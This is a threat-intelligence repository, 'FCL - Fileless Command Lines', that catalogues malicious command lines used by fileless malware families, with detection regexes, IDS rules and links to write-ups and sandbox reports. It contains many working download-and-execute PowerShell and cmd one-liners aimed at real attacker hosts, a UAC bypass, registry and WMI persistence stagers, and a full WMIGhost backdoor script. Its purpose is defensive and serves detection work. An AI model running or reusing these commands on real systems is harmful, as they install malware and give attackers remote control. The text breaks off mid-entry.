├── Malwares
│   ├── Locky.md
│   ├── r77 rootkit.md
│   ├── CryptoWorm.md
│   ├── Magnitude EK.md
│   ├── JS_POWMET.md
│   ├── August.md
│   ├── PowerSniff.md
│   ├── Keybase.md
│   ├── PowerWare.md
│   ├── Kovter.md
│   ├── Poweliks.md
│   ├── Phase Bot.md
│   ├── CodeFork.md
│   ├── Astaroth.md
│   ├── Silence.md
│   ├── GZipDe.md
│   ├── NetWire.md
│   ├── Valyria.md
│   ├── WMIGhost.md
│   ├── Emotet.md
│   └── Rozena.md
└── README.md

--------------------------------------------------------------------------------
/Malwares/Locky.md:
--------------------------------------------------------------------------------
## Locky

#### Commands
---

* Winword.exe

1.
```
{ddeauto c:\\windows\\system32\\cmd.exe "/k powershell IEX(New-Object Net.WebClient).Downloadstring('[URL]' )" \* MERGEFORmAT}
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:
* https://www.zscaler.com/blogs/research/microsoft-dde-protocol-based-malware-attacks

Sandbox reports:

Notes:

--------------------------------------------------------------------------------
/Malwares/r77 rootkit.md:
--------------------------------------------------------------------------------
## r77 rootkit

#### Commands
---

* Powershell.exe

1.
```
"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:

* https://github.com/bytecode77/r77-rootkit (Including source code)
* https://bytecode77.com/downloads/r77%20Rootkit%20Technical%20Documentation.pdf

Sandbox reports:

Notes:

--------------------------------------------------------------------------------
/Malwares/CryptoWorm.md:
--------------------------------------------------------------------------------
## CryptoWorm

#### Commands
---

* Powershell.exe

1.
```
"if(!([string](Get-WMIobject -Namespace root\Subscription -Class __FilterToConsumerBinding )).contains('SCM Event Filter')) {IEX(New-Object Net.WebClient).DownloadString('[URL]')}"
```

#### Regular Expressions
---

```
^(?=.*\bWMIobject\b)(?=.*\bSCM\b)(?=.*\bIEX\b)(?=.*\bDownloadString\b).*$
```

#### Resources
---

Technical write-ups:
* https://securityaffairs.co/wordpress/63488/malware/advanced-memory-cryptoworm.html

Sandbox reports:

Notes:

--------------------------------------------------------------------------------
/Malwares/Magnitude EK.md:
--------------------------------------------------------------------------------
## Magnitude EK

#### Commands
---

* Rundll32.exe

1.
```
javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject('script:http://dx30z30a4t11l7be .lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')
```

#### Regular Expressions
---

```
^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bGetObject\b)(?=.*\bscript:http\b).*$
```

#### Resources
---

Technical write-ups:
* https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/

Sandbox reports:

Notes:

--------------------------------------------------------------------------------
/Malwares/JS_POWMET.md:
--------------------------------------------------------------------------------
## JS_POWMET

#### Commands
---

* Powershell.exe

1.
```
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\FTZLZTRLAPJCLE').ZRAKUTR)));
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:
* https://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/

Sandbox reports:
* https://www.hybrid-analysis.com/sample/bff21cbf95da5f3149c67f2c0f2576a6de44fa9d0cb093259c9a5db919599940?environmentId=100

Notes:

--------------------------------------------------------------------------------
/Malwares/August.md:
--------------------------------------------------------------------------------
## August

#### Commands
---

* Powershell.exe

1.
```
-w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://[URL].asp') | iex
```

#### Regular Expressions
---

```
^(?=.*\bbypass\b)(?=.*\bNet\.WebClient\b)(?=.*\bDownloadFile\b)(?=.*\biex\b).*$
```

#### Resources
---

Technical write-ups:
* https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene

Sandbox reports:
* https://www.hybrid-analysis.com/sample/c432cc99b390b5edbab400dcc322f7872d3176c08869c8e587918753c00e5d4e?environmentId=100

Notes:

--------------------------------------------------------------------------------
/Malwares/PowerSniff.md:
--------------------------------------------------------------------------------
## PowerSniff

#### Commands
---

* Powershell.exe

1.
```
-ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/cache') | iex } else {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/css') | iex}
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:
* https://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/

Sandbox reports:
* https://www.hybrid-analysis.com/sample/a8663becc17e34f85d828f53029ab110f92f635c3dfd94132e5ac87e2f0cdfc3?environmentId=4

Notes:

--------------------------------------------------------------------------------
/Malwares/Keybase.md:
--------------------------------------------------------------------------------
## Keybase

#### Commands
---

* Powershell.exe

1.
```
-w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://[URL]','%TEMP%\\pu457.exe') & reg add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d %TEMP%\\pu457.exe /f & eventvwr.exe & PING -n 15 127.0.0.1>nul & %TEMP%\\pu457.exe
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:
* https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/

Sandbox reports:
* https://www.hybrid-analysis.com/sample/e431bc1bacde51fd39a10f418c26487561fe7c3abee15395314d9d4e621cc38e?environmentId=100

Notes:

--------------------------------------------------------------------------------
/Malwares/PowerWare.md:
--------------------------------------------------------------------------------
## PowerWare

#### Commands
---

* Cmd.exe

1.
```
/K poweRshell.exe -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa. in/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:
* https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/

Sandbox reports:
* https://www.hybrid-analysis.com/sample/69ee6349739643538dd7eb60e92368f209e12a366f00a7b80000ba02307c9bdf?environmentId=100

Notes:

--------------------------------------------------------------------------------
/Malwares/Kovter.md:
--------------------------------------------------------------------------------
## Kovter

#### Commands
---

* Mshta.exe

1.
```
javascript:d7hcQ4a="vn";n0a=new%20ActiveXObject("WScript.Shell");Rtf7j="HIPc";X18ycI=n0a.RegRead("HKCU\\software\\tN32795\\74gjfzcsfI");jM5IV6m="QJ";eval(X18ycI);XIaL0uze="lYuLz1vG"
```

#### Regular Expressions
---

```
^(?=.*\bjavascript:\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b)(?=.*\beval\b).*$
```

#### Resources
---

Technical write-ups:
* https://threatvector.cylance.com/en_us/home/threat-spotlight-kovter-malware-fileless-persistence-mechanism.html

Sandbox reports:
* https://www.hybrid-analysis.com/sample/5addc5c129282e9705b65b7156134e1c752a9ed2379a75471795c5c95e2a2110?environmentId=100
* https://www.hybrid-analysis.com/sample/f5be23df0cfd529674c9939bf11e4d0f61693f898cf989e7b7acf62202c0874e?environmentId=100

Notes:

--------------------------------------------------------------------------------
/Malwares/Poweliks.md:
--------------------------------------------------------------------------------
## Poweliks

#### Commands
---

* Rundll32.exe

1.
```
javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
```

#### Regular Expressions
---

```
^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b).*$
```

#### Resources
---

Technical write-ups:
* https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
* https://www.symantec.com/connect/blogs/poweliks-click-fraud-malware-goes-fileless-attempt-prevent-removal
* http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/evolution-of-poweliks.pdf

Sandbox reports:

Notes:

--------------------------------------------------------------------------------
/Malwares/Phase Bot.md:
--------------------------------------------------------------------------------
## Phase Bot

#### Commands
---

* Rundll32.exe

1.
```
javascript:"\..\mshtml,RunHTMLApplication ";eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\Software\\Microsoft\\Active%20Setup\\Installed%20Components\\{72507C54-3577-4830-815B-310007F6135A}\\JavaScript"));close();
```

#### Regular Expressions
---

```
^(?=.*\bjavascript\b)(?=.*\bRunHTMLApplication\b)(?=.*\bWScript\.Shell\b)(?=.*\bRegRead\b)(?=.*\bHKCU\b).*$
```

#### Resources
---

Technical write-ups:
* https://www.malwaretech.com/2014/12/phase-bot-fileless-rootki.html
* https://www.malwaretech.com/2014/12/phase-bot-fileless-rootkit-part-2.html

Sandbox reports:
* https://www.hybrid-analysis.com/sample/438258d0710ddbb280a5a1ed801392a5194eaece16ba85591fe5eb4815bf56a8?environmentId=100

Notes:

https://twitter.com/MalwareTechBlog/status/543342292917301248 @MalwareTechBlog

--------------------------------------------------------------------------------
/Malwares/CodeFork.md:
--------------------------------------------------------------------------------
## CodeFork

#### Commands
---

* Powershell.exe

1.
```
-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\[Same Random Key]').[Random Value Name])));
```

2.
```
-nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString('https://somerandomevildomain.xx /somerandomflie'))
```

* Regsvr32.exe

1.
```
/s /u /i:http://xxx.somerandomevildomain.xx/evilpath.xml scrobj.dll
```

#### Regular Expressions
---

```
^(?=.*\bNonInteractive\b)(?=.*\bbypass\b)(?=.*\bASCII\.GetString\b)(?=.*\bHKCU\b).*$
```

#### Resources
---

Technical write-ups:
* https://security.radware.com/malware/codefork-malware/

Sandbox reports:

Notes:

--------------------------------------------------------------------------------
/Malwares/Astaroth.md:
--------------------------------------------------------------------------------
## Astaroth

#### Commands
---

* Wmic.exe

1. [partial]
```
os get ved5hit39, 25hit8, numberofusers /format:"https://storage.googleapis.com/ultramaker/09/v.txt"
```

2. [partial]
```
os get QMUTSQPK, JUXKBVOK, LNFTZKMH, freephyscialmemory /format:"https://storage.googleapis.com/ultramaker/08/vv.txt"
```

* Bitsadmin.exe

1. [partial]
```
/transfer msd5 /priority foreground https://storage.googleapis.com/ultramaker/x/ 09/falcvonxrenwb.jpg.zip.log? %PUBLIC%\Libraries\temporary\falxconxrenwb.jpg.z
```

* Certutil.exe

1.
```
-decode %PUBLIC%\Libraries\temporary\falxconxrenwb.jpg.z %PUBLIC%\Libraries\temporary\falxconxrenwb.~
```

* Regsvr32.exe

1.
```
/s falxconxrenw64.~
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:
* https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/

Sandbox reports:

Notes:

--------------------------------------------------------------------------------
/Malwares/Silence.md:
--------------------------------------------------------------------------------
## Silence

#### Commands
---

* Mshta.exe

1.
```
vBsCRIPT:EXECute("dv = Array(""W"", ""l"") : Set sdf = createObject(dv(0)+""ScRipt.She""+dv(1)+dv(1)): sdf.rUn ""ping 127.0.0.2 -n 99"", 0, 1: sdf.rUn ""cmd.exe /c powe%ALLUSERSPROFILE:~4,1%shell.exe """"$hjf=New-Object System.Net.WebClient;$hjf.Proxy=[System.N^et.WebRequest]::GetSystemWebProxy();$hjf.Proxy.Credentials=[System.N^et.CredentialCache]::DefaultCredentials;$hjf.Headers.Add('User-Agent','M/5.18');$r=$hjf.DownloadString('http://193.109.69.5/gggm/upl/txt');IEX $r"""""", 0 : window.close")
```

* Cmd.exe

1.
```
/c powe%ALLUSERSPROFILE:~4,1%shell.exe "$hjf=New-Object System.Net.WebClient;$hjf.Proxy=[System.N^et.WebRequest]::GetSystemWebProxy();$hjf.Proxy.Credentials=[System.N^et.CredentialCache]::DefaultCredentials;$hjf.Headers.Add('User-Agent','M/5.18');$r=$hjf.DownloadString('http://193.109.69.5/gggm/upl/txt');IEX $r"
```

* Powershell.exe

1.
```
"$hjf=New-Object System.Net.WebClient;$hjf.Proxy=[System.N^et.WebRequest]::GetSystemWebProxy();$hjf.Proxy.Credentials=[System.N^et.CredentialCache]::DefaultCredentials;$hjf.Headers.Add('User-Agent','M/5.18');$r=$hjf.DownloadString('http://193.109.69.5/gggm/upl/txt');IEX $r"
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:
* https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf

Sandbox reports:
* https://app.any.run/tasks/23735fe4-6ff8-4a31-aace-775be70e8097/

Notes:

--------------------------------------------------------------------------------
/Malwares/GZipDe.md:
--------------------------------------------------------------------------------
## GZipDe

#### Commands
---

* Schtasks.exe

1.
```
/Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://118.193.251.137/dropbox/?p=BT67HU78HZ\\\",\\\"$env:public\svchost325.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost325.vbs\\\");" /F
```

* Powershell.exe

1.
```
-W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\'http[:]//118.193.251[.]137/dropbox/?p=BT67HU78HZ\\\',\\\'$env:public\svchost325.vbs\\\');(New-Object -com Shell.Application).ShellExecute(\\\'$env:public\svchost325.vbs\\\');' /F
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:
* https://www.alienvault.com/blogs/labs-research/gzipde-an-encrypted-downloader-serving-metasploit

Sandbox reports:
* https://app.any.run/tasks/e918c80e-ce60-42d6-b365-8fd3256420f0

Notes:

@Alienvault

#### Network Detection

Multi-purpose:

* AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)
* ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host
* ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate

Dedicated:

* alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"/^\/dropbox\/\?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)
* alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# FCL - Fileless Command Lines
Known command-lines of fileless malicious executions.

## Motivation

While hashing malicious files to identify malicious executions is easy, blocking the execution of fileless malware is more challenging.
This repository's purpose is to collect command lines used by threat actors, to ease the difficulty of identifying them.

## Structure

Each FCL file contains (or may contain) the following data:
* Malware name
* Executing process(es)
* Malicious command-lines (containing dysfunctional URLs)
* Fully or partially deobfuscated command-lines
* Regular expression for detection
* Technical write-ups
* Sandbox report links
* Notes

## Contributions
If you have any malware-related command line (deobfuscated or not), sandbox links, technical write-up, regular expression or any other useful suggestion, please share it with me and I will update this repository accordingly.

## References
Here are some great references elaborating on fileless malicious executions and their use over time:
* https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats
* https://blog.malwarebytes.com/threat-analysis/2018/08/fileless-malware-getting-the-lowdown-on-this-insidious-threat/
* https://zeltser.com/fileless-malware-beyond-buzzword/

## GPL 3
FCL - Fileless Command Lines Copyright (C) 2018, Chen Erlich ([@chen_erlich](https://twitter.com/chen_erlich)).

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.

## TODO
- [ ] Add more fileless malware
- [ ] Sharpen or add regular expressions

--------------------------------------------------------------------------------
/Malwares/NetWire.md:
--------------------------------------------------------------------------------
## NetWire

#### Commands
---

* Powershell.exe

1.
```
"-Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://spacemantra.biz/blyat.jpeg')"
```

2.
```
"-ep Bypass -w 1 /e [base64-encoded command omitted]"
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:

Sandbox reports:
* https://app.any.run/tasks/5da55373-a1b5-47f9-b04b-b72d25c15fa8/
* https://www.joesandbox.com/analysis/245611/1/html

Notes:

--------------------------------------------------------------------------------
/Malwares/Valyria.md:
--------------------------------------------------------------------------------
## Valyria

#### Commands
---

* Cmd.exe

1.
```
Cmd /V/C"^se^t 8^J^Z^j= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac};k^a^er^b;hi^b$^ ^met^I-^ekovn^I^;)h^ib^$^ ,r^T^S^$(e^l^i^F^d^ao^ln^w^oD.Zjb$^{^yrt^{)V^H^b^$ n^i^ rT^S^$(hc^aer^o^f;'^exe.'^+^ErH^$+'^\^'+ci^l^bup:vne^$^=h^ib$;'^6^4^5'^ ^=^ Er^H$^;)^'@^'(^tilp^S^.^'^OkP^B^6rC^K/r^b.m^oc^.ai^go^lonc^et^k^3^h//^:^p^t^th^@^SPavtf^hdT0/^gr^o^.m^irim^anrap^b^t^i//^:p^t^th^@^b^Y^F4h^aK/^gro.ak^ic^a^l//:ptth^@c^o^Ux8Iwxp/gr^o.^a^s^up^j//:pt^t^h@ajt^Z^z^4^5^G/^m^oc.^a^sun^oin^o^kni^p^e^ht//:^p^tth^'=V^Hb$;tne^ilC^b^e^W^.^t^eN tc^ejb^o^-^wen=^Zjb^$^ ^l^le^h^sre^w^op&&^for /^L %^s ^in (37^1^,^-1^,^0)^d^o ^s^e^t Z^4=!Z^4!!8^J^Z^j:~%^s,1!&&^if %^s l^ss ^1 cal^l %Z^4:^*Z^4^!=%"
```

Partially deobfuscated
```
Cmd /V/C"set 8JZj= }}{hctac};kaerb;hib$ metI-ekovnI;)hib$ ,rTS$(eliFdaolnwoD.Zjb${yrt{)VHb$ ni rTS$(hcaerof;'exe.'+ErH$+'\'+cilbup:vne$=hib$;'645' = ErH$;)'@'(tilpS.'OkPB6rCK/rb.moc.aigoloncetk3h//:ptth@SPavtfhdT0/gro.mirimanrapbti//:ptth@bYF4haK/gro.akical//:ptth@coUx8Iwxp/gro.asupj//:ptth@ajtZz45G/moc.asunoinoknipeht//:ptth'=VHb$;tneilCbeW.teN tcejbo-wen=Zjb$ llehsrewop&&for /L %s in (371,-1,0)do set Z4=!Z4!!8JZj:~%s,1!&&if %s lss 1 call %Z4:*Z4!=%"
```

2.
```
CMd /V:/C"s^e^t ;^$=^301^ ^309^ ^0^51^ 5^19 ^591^ ^1^50^ ^5^31 ^1^5^0 ^1^0^3^ 59^1 ^359 ^53^9^ 9^1^3^ 139 ^13^5 3^95^ ^351 ^9^1^0}^135^}930^{^0^51h9^30c305^t310a03^9c^30^5^}9^3^5;^1^0^9^k^5^0^1a1^0^3e^1^3^9r^1^3^9^b^591^;^13^5^K5^0^9^T^90^5^I^953$0^9^5^ 039m5^30e^0^9^1t10^5I^1^59^-10^9e^9^31^k^30^5^o3^50v^5^9^3n93^0^I^30^9^;31^0)^503^K051^T509I^3^10^$^35^0^ ^059,^3^91^q^3^95^u35^9P159^$59^1(035e9^10l^39^0^i905^F^13^0^d^9^0^5a^5^9^1o^9^5^0^l039n^9^0^5^w91^3^o30^5D195^.9^10^z^05^1^m135^T^1^9^3^$^50^9{3^90y109r539^t13^5^{^5^0^9)95^1d^391^Y093q^0^9^3$^01^9 519n^930i^309 5^93^q^391u5^0^9^P309$^51^9(^5^1^0h1^5^9c^5^0^3a9^5^0^e^319r0^5^3o^51^0^f^931^;^0^13^'13^5^e^53^9x^09^5^e^90^1^.^1^9^5^'^1^3^5+51^9J^9^35^t5^90^q3^0^9$3^5^1+^5^9^3^'^913\^9^01'3^5^0^+315c35^9i9^31^l^9^31b01^5^u^935^p0^51:^0^53v^5^0^9n^5^30e^153$^1^0^5=^01^3K319T531^I1^0^5$5^9^1;53^9^'05^1^9^30^17^39^1^9^51^0^'5^39 590=^3^19 935^J5^1^3t3^5^0q^135$3^15;9^05)05^9^'501^@093^'^3^59(^359^t^3^5^9i319^l1^95^p^159S501.^0^15^'9^30^K0^15I^95^0m^10^3^y^359E^13^0^K^5^0^1^m^3^9^0^K031/093^b3^01u^3^1^0p53^1.931e93^1^l^5^13i0^1^3^a3^5^1/^93^1/^31^9^:3^59^p019t5^3^9t^0^59h153^@^91^3x^3^50^7591C^51^9^851^0^6^195f^951^S01^57^51^0/9^13^l935n0^93.^13^5s^01^3u15^3^i0^15^l^519^e03^1w0^13r^3^9^1^e^350v^5^1^0^s5^90g0^5^1/930/9^1^3:0^3^1p503t31^5^t5^3^0h^305^@^1^53^k9^15/^53^0g39^5r1^5^0^o59^3^.^1^5^3y^31^0e^5^90k35^1c195o503^h19^3s9^13^t^03^9a^10^5c^9^53l^0^5^9^l^0^5^3e^931h31^9/3^05/130:031p1^09t59^1t^01^9h^3^01^@10^5X^3^9^0^X^1^0^5S5^10^H5^30^m^350^7351/^3^95^m10^9o1^59c^9^13^.395^y5^03h^0^93^p^5^03^a^190r^3^50g^30^9o^513^t^903^o^1^5^9^h301^p095s1^5^3^k1^39e531^e^053w^1^39f1^53f^301^e5^9^3j^5^0^1/9^5^3/^951:^1^09^p309t19^0t915h935@1^39^J5^0^3O^9^35L91^0^6^3^05^E^3^01X150/35^1^m39^1^o1^5^3c^05^9.1^53^z3^05k190c391^i^1^5^9^t3^5^1s1^09y9^35e950k^1^3^9c^3^1^0^o^519h^53^1/^1^9^3/095:^0^35p^509t510t953h^9^10'9^35=^1^35d^95^0^Y10^9q^3^5^1$^509;^390^t^5^09n^39^0^e^19^0^i^195^l^3^5^0C^950^b^139^e^019W^0^1^5.39^0t395^e01^3N^51^3^ ^1^35^t91^5c5^1^9^e^5^9^0j^50^3^b^1^9^3^o^9^31-^1^0^9^w^9^30^e^310n193^=91^0^z501^m^10^5^T^09^5^$^91^3^ 95^0^l0^5^1l^9^10e0^13h351s^951r^0^51e0^31^w019o093^p&&^f^or /^L %^j ^in (^14^5^5,-4,^3)^do ^s^et ?^]=!?^]!!;^$:~%^j,1!&&i^f %^j ^le^q ^3 ca^l^l %?^]:~^4%"
```

Partially deobfuscated
```
CMd /V:/C"set ;$=301 309 051 519 591 150 531 150 103 591 359 539 913 139 135 395 351 910}135}930{051h930c305t310a039c305}935;109k501a103e139r139b591;135K509T905I953$095 039m530e091t105I159-109e931k305o350v593n930I309;310)503K051T509I310$350 059,391q395u359P159$591(035e910l390i905F130d905a591o950l039n905w913o305D195.910z051m135T193$509{390y109r539t135{509)951d391Y093q093$019 519n930i309 593q391u509P309$519(510h159c503a950e319r053o510f931;013'135e539x095e901.195'135+519J935t590q309$351+593'913\901'350+315c359i931l931b015u935p051:053v509n530e153$105=013K319T531I105$591;539'051930173919510'539 590=319 935J513t350q135$315;905)059'501@093'359(359t359i319l195p159S501.015'930K015I950m103y359E130K501m390K031/093b301u310p531.931e931l513i013a351/931/319:359p019t539t059h153@913x3507591C51985106195f951S0157510/913l935n093.135s013u153i015l519e031w013r391e350v510s590g051/930/913:031p503t315t530h305@153k915/530g395r150o593.153y310e590k351c195o503h193s913t039a105c953l059l053e931h319/305/130:031p109t591t019h301@105X390X105S510H530m3507351/395m109o159c913.395y503h093p503a190r350g309o513t903o159h301p095s153k139e531e053w139f153f301e593j501/953/951:109p309t190t915h935@139J503O935L9106305E301X150/351m391o153c059.153z305k190c391i159t351s109y935e950k139c310o519h531/193/095:035p509t510t953h910'935=135d950Y109q351$509;390t509n390e190i195l350C950b139e019W015.390t395e013N513 135t915c519e590j503b193o931-109w930e310n193=910z501m105T095$913 950l051l910e013h351s951r051e031w019o093p&&for /L %j in (1455,-4,3)do set ?]=!?]!!;$:~%j,1!&&if %j leq 3 call %?]:~4%"
```

* Powershell.exe

1.
```
$Tmz=new-object Net.WebClient;$qYd='http://hockeystickz.com/XE6LOJ@http://jeffweeksphotography.com/7mHSXX@http://hellcatshockey.org/k@http://gsverwelius.nl/7Sf68C7x@http://aile.pub/KmKEymIK'.Split('@');$qtJ = '979';$ITK=$env:public+'\'+$qtJ+'.exe';foreach($Puq in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}}
```

#### Regular Expressions
---

#### Resources
---

Technical write-ups:

Sandbox reports:
* https://www.hybrid-analysis.com/sample/d40f5ae2f85b62351f2e8b0f068a8c3695d228b0f06b8015a513eb919b70f5bb?environmentId=100
* https://www.hybrid-analysis.com/sample/7ff75d41557843d9981e0f3aa7e46fa0a936b8a8a55fcdce6912b102c9860370?environmentId=100

Notes:

--------------------------------------------------------------------------------
/Malwares/WMIGhost.md:
--------------------------------------------------------------------------------
## WMIGhost

#### Commands
---

* Scrcons.exe

```
function e(e,t){var n="winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription",r=GetObject(n+":ActiveScriptEventConsumer").spawninstance_();r.name="ProbeScriptFint",r.scriptingengine="javascript",r.ScriptText=t+"var sOwner='"+e+"';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\"%PCI%\\\" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\"scrcons.exe\\\"'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();";var i=r.Put_();r=GetObject(n+":__IntervalTimerInstruction").spawninstance_(),r.Timerid="ProbeScriptFint",r.IntervalBetweenEvents=6e3,r.Put_(),r=GetObject(n+":__EventFilter").spawninstance_(),r.name="ProbeScriptFint",r.Query='select * from __timerevent where timerid="ProbeScriptFint"',r.QueryLanguage="WQL";var s=r.Put_();return r=GetObject(n+":__FilterToConsumerBinding").SpawnInstance_(),r.Consumer=i.path,r.Filter=s.path,r.Put_(),""};e("XDD",'var sXmlUrl="http://kumardeep.sosblogs .com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff .com/anilchopra/feed/;http://www.blogster .com/kapoorsunil09/profile/rss";');
```

Deobfuscated
```
var sXmlUrl =
